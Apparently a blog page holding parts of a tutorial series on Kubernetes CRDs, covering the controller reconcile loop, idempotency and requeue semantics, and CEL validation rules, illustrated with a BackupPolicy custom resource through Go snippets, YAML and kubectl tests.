# Uninstall CRD (WARNING: deletes all instances)
make uninstall

Key Takeaways

  • kubebuilder scaffolds the project; you write the types and the reconcile function
  • Go struct markers (//+kubebuilder:...) generate the CRD YAML and RBAC — keep them close to the code they describe
  • ctrl.SetControllerReference enables automatic garbage collection of child resources
  • Always deep-copy the object before writing status; retry on conflict errors
  • make run runs the controller locally — no Docker build needed during development

What’s Next

EP08: Kubernetes CRD Versioning covers how to evolve the BackupPolicy schema from v1alpha1 to v1 without breaking existing clients — storage versions, conversion webhooks, and the hub-and-spoke model for safe API evolution in production clusters.

Get EP08 in your inbox when it publishes → subscribe at linuxcent.com

The Kubernetes Controller Reconcile Loop: How CRDs Come Alive at Runtime

Reading Time: 7 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 6
What Is a CRD? · CRDs You Already Use · CRD Anatomy · Write Your First CRD · CEL Validation · Controller Loop · Build an Operator · CRD Versioning · Admission Webhooks · CRDs in Production


TL;DR

  • The Kubernetes controller reconcile loop is the mechanism that makes CRDs do something — it watches custom resources, compares desired state (spec) to actual state, and takes actions to close the gap
    (reconcile = “make actual match desired”; the loop runs repeatedly because the world is not static — things drift, fail, and change)
  • Controllers do not receive events like webhooks — they receive object names from a work queue, then re-read the full object from the API server cache
  • The reconcile function is idempotent: calling it ten times with the same object must produce the same result as calling it once
  • controller-runtime is the Go library that provides the informer cache, work queue, and reconciler interface — kubebuilder scaffolds controllers on top of it
  • Kubernetes uses the same reconcile loop internally — the Deployment controller, ReplicaSet controller, and node lifecycle controller all follow this exact pattern
  • A failed reconcile returns an error or explicit requeue request; the controller retries with exponential backoff, not an infinite tight loop

The Big Picture

  THE KUBERNETES CONTROLLER RECONCILE LOOP

  etcd
   │ change event
   ▼
  Informer cache
  (API server-side list+watch,
   local in-memory replica)
   │ cache update → enqueue object name
   ▼
  Work queue
  (rate-limited, deduplicating)
   │ dequeue: "demo/nightly"
   ▼
  Reconcile(ctx, Request{Name, Namespace})
   │
   ├── 1. Fetch object from cache
   │        if not found → ignore (already deleted)
   │
   ├── 2. Read spec (desired state)
   │
   ├── 3. Read actual state
   │        (check child resources, external systems)
   │
   ├── 4. Compare: actual vs desired
   │
   ├── 5. Act: create/update/delete child resources
   │        OR update external system
   │
   └── 6. Update status with outcome
           └── return Result{}, nil      → done
               return Result{Requeue}, nil → retry after delay
               return Result{}, err     → immediate retry + backoff

The Kubernetes controller reconcile loop is what separates a CRD (validated storage) from an operator (automated behavior). Understanding this loop is the prerequisite for writing controllers that work correctly under failure, partial completion, and concurrent modification.


What “Reconcile” Actually Means

Reconcile means: look at what the user asked for (spec), look at what actually exists, and do whatever is needed to make actual match desired.

The key insight is that this is not event-driven in the traditional sense. A controller does not receive a “diff” — it receives a name. It reads the full current state of the object and acts accordingly.

This matters because:

  1. Multiple events get deduplicated. If a BackupPolicy is updated five times in one second, the work queue delivers one reconcile call, not five.
  2. The reconcile is stateless. The controller should not maintain in-memory state about what it “did last time.” It re-reads everything on each reconcile.
  3. Partial failure is safe. If the reconcile fails halfway through, the next reconcile re-reads actual state and continues from where it left off.

The Informer Cache

Controllers do not call the API server directly for every read. They use an informer — a list-and-watch mechanism that maintains a local in-memory copy of all objects of a given type.

  HOW THE INFORMER CACHE WORKS

  Controller startup:
  ┌─────────────────────────────────────────────────────┐
  │ 1. List all BackupPolicies from API server          │
  │    → populate local cache                           │
  │ 2. Establish a Watch stream                         │
  │    → receive incremental updates                    │
  │ 3. For each update: update cache + enqueue object   │
  └─────────────────────────────────────────────────────┘

  On reconcile:
  ┌─────────────────────────────────────────────────────┐
  │ controller reads from LOCAL cache (not API server)  │
  │ → fast, no network round-trip per reconcile         │
  │ → cache is eventually consistent                    │
  └─────────────────────────────────────────────────────┘

Cache consistency: After writing a change (creating a child Secret, for example), re-reading from the cache may return the old state for a brief period. This is normal and expected. Well-written controllers handle this by returning a requeue rather than assuming the write is immediately visible.


Walking Through a Reconcile for BackupPolicy

Suppose a user creates this BackupPolicy:

apiVersion: storage.example.com/v1alpha1
kind: BackupPolicy
metadata:
  name: nightly
  namespace: demo
spec:
  schedule: "0 2 * * *"
  retentionDays: 30
  targets:
    - namespace: production

The controller’s reconcile function runs. Here is what it does conceptually:

Reconcile(ctx, {Namespace: "demo", Name: "nightly"})

Step 1: Fetch BackupPolicy "demo/nightly" from cache
  → found; spec.schedule = "0 2 * * *", spec.retentionDays = 30

Step 2: Check if a CronJob for this BackupPolicy exists
  → kubectl get cronjob nightly-backup -n demo
  → not found

Step 3: Gap detected: CronJob should exist but doesn't
  → Create CronJob "nightly-backup" in namespace "demo"
    spec.schedule = "0 2 * * *"
    spec.jobTemplate.spec.template.spec.containers[0].args = ["--retention=30"]

Step 4: Set owner reference on CronJob pointing to BackupPolicy
  → CronJob is now garbage-collected if BackupPolicy is deleted

Step 5: Update BackupPolicy status
  → conditions: [{type: Ready, status: True, reason: CronJobCreated}]
  → lastScheduleTime: null (not yet run)

Step 6: Return Result{}, nil   → reconcile complete

Next time the BackupPolicy is modified (e.g., suspended: true):

Reconcile(ctx, {Namespace: "demo", Name: "nightly"})

Step 1: Fetch → spec.suspended = true

Step 2: Fetch CronJob "nightly-backup"
  → found; spec.suspend = false  ← actual state

Step 3: Gap: CronJob.spec.suspend should be true but is false
  → Patch CronJob: set spec.suspend = true

Step 4: Update status
  → conditions: [{type: Ready, status: True, reason: Suspended}]

Step 5: Return Result{}, nil

Idempotency: The Essential Property

The reconcile function must be idempotent. If it runs ten times with the same object state, the result must be the same as if it ran once.

Why? Because the controller framework delivers at-least-once semantics — your reconcile function will be called more than once for the same object state, especially at startup (the informer re-lists all objects) and after controller restarts.

Non-idempotent (wrong):

// Creates a new CronJob every time, even if one already exists
err := r.Create(ctx, cronJob)

Idempotent (correct):

// Only creates if it doesn't exist; updates if it does
existing := &batchv1.CronJob{}
err := r.Get(ctx, types.NamespacedName{Name: jobName, Namespace: ns}, existing)
if apierrors.IsNotFound(err) {
    err = r.Create(ctx, cronJob)
} else if err == nil {
    // update if spec differs
    existing.Spec = cronJob.Spec
    err = r.Update(ctx, existing)
}

The get-before-create pattern is the most basic idempotency mechanism. controller-runtime provides CreateOrUpdate helpers that codify this.


Requeue and Retry Semantics

The reconcile function returns a (Result, error) pair:

return Result{}, nil
  → Reconcile succeeded. Re-run only if object changes again.

return Result{RequeueAfter: 5 * time.Minute}, nil
  → Reconcile succeeded, but requeue in 5 minutes regardless.
  → Used for: polling external system, TTL-based refresh.

return Result{Requeue: true}, nil
  → Requeue immediately (with rate limiting).
  → Used for: cache not yet consistent after a write.

return Result{}, err
  → Reconcile failed. Retry with exponential backoff.
  → Used for: API errors, transient failures.
  RETRY BEHAVIOR

  First failure  → retry after ~1s
  Second failure → retry after ~2s
  Third failure  → retry after ~4s
  ...
  Max backoff    → ~16min (controller-runtime default)

  Object changes (new version from informer) → reset backoff, reconcile immediately

Do not return Result{Requeue: true}, nil in a tight loop — this saturates the work queue and starves other objects. If you need to poll, use RequeueAfter with a meaningful interval.


Watches: What Triggers a Reconcile

The controller does not only watch the primary resource (BackupPolicy). It also watches child resources and maps child changes back to the parent:

  WATCH CONFIGURATION (conceptual)

  Controller watches:
    BackupPolicy (primary) → reconcile when BackupPolicy changes
    CronJob (child/owned)  → reconcile BackupPolicy owner when CronJob changes
    ConfigMap (watched)    → reconcile BackupPolicy when referenced ConfigMap changes

If a user accidentally deletes the CronJob that the controller created:

  1. CronJob deletion event arrives in the informer
  2. Controller maps the deleted CronJob → its owner BackupPolicy
  3. BackupPolicy is enqueued
  4. Reconcile runs, detects missing CronJob, recreates it

This “self-healing” behavior — where controllers reconcile the world back to desired state — is the core operational value of operators. It is not magic; it is the result of watching child resources and re-running reconcile when they drift.


Level-Triggered vs Edge-Triggered

Kubernetes controllers are level-triggered, not edge-triggered. This distinction matters:

  EDGE-TRIGGERED (not what Kubernetes uses)
  → "BackupPolicy was updated FROM retained-30 TO retained-7"
  → If event is lost, the update is lost forever

  LEVEL-TRIGGERED (what Kubernetes uses)
  → "BackupPolicy exists with retentionDays=7"
  → On every reconcile, the controller reads the current level (state)
  → Missing an event is safe — the next reconcile corrects the state

Level-triggered design is why controllers survive restarts, network partitions, and lost events gracefully. The reconcile does not need to track “what changed” — it only needs to know “what is the desired state right now.”


The Same Pattern in Kubernetes Core

Every built-in Kubernetes controller follows this loop:

Controller Watches Manages Reconciles
Deployment controller Deployment ReplicaSets desired replicas ↔ actual ReplicaSet count
ReplicaSet controller ReplicaSet Pods desired replicas ↔ running Pod count
Node lifecycle controller Node Node conditions NotReady nodes → taint, evict pods
Service controller (cloud) Service LoadBalancer cloud LB exists ↔ Service spec

The BackupPolicy controller you will build in EP07 follows exactly the same structure as the Deployment controller.


⚠ Common Mistakes

Reading from the API server directly instead of the cache. Every reconcile reading directly from the API server (not the informer cache) creates N×M load on the API server as the number of objects and reconcile frequency grows. Always read via the controller’s cached client.

Not handling “not found” on object fetch. If a reconcile is triggered but the object has been deleted by the time reconcile runs, the cache returns “not found.” This is normal — the correct response is to return Result{}, nil, not an error.

Tight requeue loop on recoverable error. Returning Result{Requeue: true}, nil or Result{}, err on every call creates an infinite busy-loop. Use RequeueAfter for expected wait conditions, and only return errors for unexpected failures that should back off.

Mutable reconcile state. Do not store reconcile state in struct fields on the reconciler. The reconciler is shared across goroutines; mutable fields cause race conditions. Everything transient must be local to the reconcile function.


Quick Reference

Reconcile input:
  ctx context.Context
  req ctrl.Request   → {Namespace: "demo", Name: "nightly"}

Reconcile output:
  (ctrl.Result, error)

Common returns:
  Result{}, nil                        → done, wait for next change
  Result{Requeue: true}, nil           → retry now (rate limited)
  Result{RequeueAfter: 5*time.Minute}  → retry in 5 minutes
  Result{}, err                        → retry with backoff

Key operations:
  r.Get(ctx, req.NamespacedName, &obj)     → fetch from cache
  r.Create(ctx, &obj)                      → create in API server
  r.Update(ctx, &obj)                      → full update
  r.Patch(ctx, &obj, patch)                → partial update
  r.Delete(ctx, &obj)                      → delete
  r.Status().Update(ctx, &obj)             → update status only

Key Takeaways

  • The reconcile loop reads desired state from spec, reads actual state from the cluster, and closes the gap — on every trigger, not just on changes
  • Controllers use an informer cache for reads — fast, eventually consistent, does not hammer the API server
  • Idempotency is not optional: the reconcile function will be called multiple times with the same state
  • Level-triggered design means missing events is safe — the next reconcile corrects any drift
  • Return values from reconcile control retry behavior: RequeueAfter for polling, err for failures, nil for success

What’s Next

EP07: Build a Simple Kubernetes Operator with controller-runtime puts the reconcile loop into practice — kubebuilder scaffold, a complete reconciler for BackupPolicy, RBAC markers, and running the operator locally against a real cluster.

Get EP07 in your inbox when it publishes → subscribe at linuxcent.com

Kubernetes CRD CEL Validation: Replace Admission Webhooks for Schema Rules

Reading Time: 6 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 5
What Is a CRD? · CRDs You Already Use · CRD Anatomy · Write Your First CRD · CEL Validation · Controller Loop · Build an Operator · CRD Versioning · Admission Webhooks · CRDs in Production


TL;DR

  • Kubernetes CRD CEL validation (x-kubernetes-validations) lets you write arbitrary validation rules in the CRD schema — no admission webhook needed
    (CEL = Common Expression Language, a lightweight expression language built into Kubernetes since 1.25 stable; replaces most reasons you would write a validating admission webhook)
  • CEL rules are evaluated by the API server at admit time — the same place as OpenAPI schema validation, before etcd
  • self refers to the current object’s field; oldSelf refers to the previous value (for update rules)
  • Cross-field validation: “if storageClass is premium, retentionDays must be ≤ 90″ — impossible with plain OpenAPI schema, trivial with CEL
  • Immutable fields: oldSelf == self with reason: Immutable prevents users from changing values after creation
  • CEL rules run in ~microseconds inside the API server; no external service, no TLS, no latency budget to manage

The Big Picture

  CEL VALIDATION: WHERE IT FITS IN THE ADMISSION CHAIN

  kubectl apply -f backup.yaml
         │
         ▼
  API Server admission chain
  ┌────────────────────────────────────────────────────┐
  │                                                    │
  │  1. Mutating admission webhooks (modify object)    │
  │  2. Schema validation (OpenAPI types, required,    │
  │     minimum/maximum, pattern)                      │
  │  3. CEL validation (x-kubernetes-validations)  ←  │ THIS EPISODE
  │  4. Validating admission webhooks (external)       │
  │                                                    │
  └────────────────────────────────────────────────────┘
         │
         ▼ (passes all checks)
  etcd storage

Kubernetes CRD CEL validation sits between schema validation and external webhooks. For most validation requirements, CEL eliminates the need for a webhook entirely — which means no separate deployment to maintain, no TLS certificates to rotate, no availability dependency between your CRD and a webhook server.


Why CEL Replaces Most Admission Webhooks

Before CEL (stable in Kubernetes 1.25), the only way to express “if field A has value X, field B must be present” was an admission webhook — a separate HTTP server that Kubernetes called synchronously during every API request.

Webhooks work, but they have real costs:

  • Availability dependency: if the webhook is down, creates/updates for that resource type fail
  • TLS management: webhook endpoints require valid TLS certs that must be rotated
  • Deployment overhead: another Deployment, Service, and certificate to manage
  • Latency: every API operation waits for an HTTP round-trip

CEL runs inside the API server process. There is no network call, no certificate, no separate deployment. Rules are compiled once and evaluated in microseconds.

The trade-off: CEL cannot make network calls or access state outside the object being validated. For rules that need to look up other resources (e.g., “does this referenced Secret exist?”), you still need a webhook or a controller that validates via status conditions.


CEL Syntax Basics

CEL expressions are small programs. In Kubernetes CRD validation, the key variables are:

Variable Meaning
self The current field value (or root object at top level)
oldSelf The previous value of the field (only available on update; nil on create)

CEL returns true (validation passes) or false (validation fails, API returns error).

Common patterns:

# String not empty
self.size() > 0

# String matches format
self.matches('^[a-z][a-z0-9-]*$')

# Integer in range
self >= 1 && self <= 365

# Field present (for optional fields)
has(self.fieldName)

# Conditional: if A then B
!has(self.premium) || self.retentionDays <= 90

# List not empty
self.size() > 0

# All items in list satisfy condition
self.all(item, item.namespace.size() > 0)

# Cross-field: access sibling field via parent
self.retentionDays >= self.minRetentionDays

Adding CEL Rules to the BackupPolicy CRD

Start from the CRD built in EP04. Add x-kubernetes-validations at the levels where you need them.

Rule 1: Cron expression validation

The OpenAPI pattern field can validate basic structure, but a proper cron regex is unwieldy. CEL is cleaner:

spec:
  type: object
  required: ["schedule", "retentionDays"]
  x-kubernetes-validations:
    - rule: "self.schedule.matches('^(\\\\*|[0-9,\\\\-\\\\/]+) (\\\\*|[0-9,\\\\-\\\\/]+) (\\\\*|[0-9,\\\\-\\\\/]+) (\\\\*|[0-9,\\\\-\\\\/]+) (\\\\*|[0-9,\\\\-\\\\/]+)$')"
      message: "schedule must be a valid 5-field cron expression"

Rule 2: Cross-field validation

spec:
  type: object
  x-kubernetes-validations:
    - rule: "!(self.storageClass == 'premium') || self.retentionDays <= 90"
      message: "premium storage class supports at most 90 days retention"
    - rule: "!self.suspended || !has(self.pausedBy) || self.pausedBy.size() > 0"
      message: "when suspended is true, pausedBy must be non-empty if provided"

Rule 3: Immutable fields

Once a BackupPolicy is created, the schedule field should not be changeable without deleting and recreating:

schedule:
  type: string
  x-kubernetes-validations:
    - rule: "self == oldSelf"
      message: "schedule is immutable after creation"
      reason: Immutable

reason field: Available reasons are FieldValueInvalid (default), FieldValueForbidden, FieldValueRequired, and Immutable. Using Immutable returns HTTP 422 with a clear message that the field cannot be changed.

Rule 4: Conditional required field

If storageClass is encrypted, then encryptionKeyRef must be present:

spec:
  type: object
  x-kubernetes-validations:
    - rule: "self.storageClass != 'encrypted' || has(self.encryptionKeyRef)"
      message: "encryptionKeyRef is required when storageClass is 'encrypted'"

Rule 5: List element validation

Ensure each target namespace is a valid RFC 1123 DNS label:

targets:
  type: array
  items:
    type: object
    x-kubernetes-validations:
      - rule: "self.namespace.matches('^[a-z0-9]([-a-z0-9]*[a-z0-9])?$')"
        message: "namespace must be a valid DNS label"

The Complete Updated CRD with CEL

apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
  name: backuppolicies.storage.example.com
spec:
  group: storage.example.com
  scope: Namespaced
  names:
    plural:     backuppolicies
    singular:   backuppolicy
    kind:       BackupPolicy
    shortNames: [bp]
  versions:
    - name: v1alpha1
      served: true
      storage: true
      schema:
        openAPIV3Schema:
          type: object
          required: ["spec"]
          properties:
            spec:
              type: object
              required: ["schedule", "retentionDays"]
              x-kubernetes-validations:
                - rule: "!(self.storageClass == 'premium') || self.retentionDays <= 90"
                  message: "premium storage class supports at most 90 days retention"
              properties:
                schedule:
                  type: string
                  x-kubernetes-validations:
                    - rule: "self == oldSelf"
                      message: "schedule is immutable after creation"
                      reason: Immutable
                retentionDays:
                  type: integer
                  minimum: 1
                  maximum: 365
                storageClass:
                  type: string
                  default: "standard"
                  enum: ["standard", "premium", "encrypted", "archive"]
                encryptionKeyRef:
                  type: string
                targets:
                  type: array
                  maxItems: 20
                  items:
                    type: object
                    required: ["namespace"]
                    x-kubernetes-validations:
                      - rule: "self.namespace.matches('^[a-z0-9]([-a-z0-9]*[a-z0-9])?$')"
                        message: "namespace must be a valid DNS label"
                    properties:
                      namespace:
                        type: string
                      includeSecrets:
                        type: boolean
                        default: false
                suspended:
                  type: boolean
                  default: false
            status:
              type: object
              x-kubernetes-preserve-unknown-fields: true
      subresources:
        status: {}
      additionalPrinterColumns:
        - name: Schedule
          type: string
          jsonPath: .spec.schedule
        - name: Retention
          type: integer
          jsonPath: .spec.retentionDays
        - name: Ready
          type: string
          jsonPath: .status.conditions[?(@.type=='Ready')].status
        - name: Age
          type: date
          jsonPath: .metadata.creationTimestamp

Testing CEL Rules

Apply the updated CRD:

kubectl apply -f backuppolicies-crd-cel.yaml

Test cross-field validation:

kubectl apply -f - <<'EOF'
apiVersion: storage.example.com/v1alpha1
kind: BackupPolicy
metadata:
  name: premium-long
  namespace: demo
spec:
  schedule: "0 2 * * *"
  retentionDays: 180          # violates: premium + > 90 days
  storageClass: premium
EOF
The BackupPolicy "premium-long" is invalid:
  spec: Invalid value: "object":
    premium storage class supports at most 90 days retention

Test immutability:

# Create valid policy
kubectl apply -f - <<'EOF'
apiVersion: storage.example.com/v1alpha1
kind: BackupPolicy
metadata:
  name: immutable-test
  namespace: demo
spec:
  schedule: "0 2 * * *"
  retentionDays: 30
EOF

# Try to change the schedule
kubectl patch bp immutable-test -n demo \
  --type=merge -p '{"spec":{"schedule":"0 3 * * *"}}'
The BackupPolicy "immutable-test" is invalid:
  spec.schedule: Invalid value: "0 3 * * *":
    schedule is immutable after creation

Test list element validation:

kubectl apply -f - <<'EOF'
apiVersion: storage.example.com/v1alpha1
kind: BackupPolicy
metadata:
  name: bad-namespace
  namespace: demo
spec:
  schedule: "0 2 * * *"
  retentionDays: 7
  targets:
    - namespace: "UPPERCASE_IS_INVALID"
EOF
The BackupPolicy "bad-namespace" is invalid:
  spec.targets[0]: Invalid value: "object":
    namespace must be a valid DNS label

CEL Cost and Limits

CEL expressions are evaluated at admission time in the API server. Kubernetes imposes cost limits to prevent expressions from consuming excessive CPU:

  • Each expression is assigned a cost based on its operations (string matches, list iteration, etc.)
  • If the expression cost exceeds the per-validation limit, the API server rejects the CRD itself when you apply it
  • Complex all() over large lists is the most common way to hit cost limits

If you hit a cost limit error:

CustomResourceDefinition is invalid: spec.validation.openAPIV3Schema...
  CEL expression cost exceeds budget

Solutions:
– Reduce list traversal in CEL rules; enforce list length with maxItems instead
– Split one expensive rule into multiple simpler rules
– Move the expensive validation to a controller (status condition) rather than admission


⚠ Common Mistakes

Using oldSelf on create. On create operations, oldSelf is nil/unset. A rule like self == oldSelf for immutability will panic on create unless you guard it: oldSelf == null || self == oldSelf. In practice, Kubernetes applies immutable rules only on updates (the reason: Immutable annotation helps here), but be explicit in rules that reference oldSelf.

Forgetting has() checks for optional fields. If encryptionKeyRef is optional (not in required) and you write a rule like self.encryptionKeyRef.size() > 0, it will fail with a “no such key” error when the field is absent. Always guard optional field access with has(self.fieldName).

Overloading CEL for what a controller should do. CEL validates fields at admission. If your rule needs to verify that a referenced Secret actually exists, CEL cannot do that — it only sees the object being submitted. Use a controller status condition for existence checks, not CEL.


Quick Reference: Common CEL Patterns

# String not empty
self.size() > 0

# String matches regex
self.matches('^[a-z][a-z0-9-]{1,62}$')

# Optional field guard
!has(self.fieldName) || self.fieldName.size() > 0

# Conditional requirement
!(condition) || has(self.requiredWhenConditionIsTrue)

# Immutable field (update only)
self == oldSelf

# All list items satisfy condition
self.all(item, item.namespace.size() > 0)

# At least one list item satisfies condition
self.exists(item, item.type == 'primary')

# Cross-field comparison
self.minReplicas <= self.maxReplicas

# Enum-style check
self.in(['standard', 'premium', 'archive'])

Key Takeaways

  • x-kubernetes-validations with CEL rules replaces most validating admission webhooks for CRD-specific logic
  • CEL runs inside the API server — no external service, no TLS, no separate deployment
  • Cross-field validation, immutable fields, and conditional requirements are all expressible in CEL
  • Use has() guards for optional fields; use oldSelf carefully (it is nil on create)
  • CEL has cost limits — avoid unbounded list iteration; use maxItems to bound lists first

What’s Next

EP06: The Kubernetes Controller Reconcile Loop explains how a controller watches BackupPolicy objects and acts on them — the mechanism that makes CRDs useful beyond validated configuration storage. Before writing code in EP07, you need to understand the reconcile loop conceptually.

Get EP06 in your inbox when it publishes → subscribe at linuxcent.com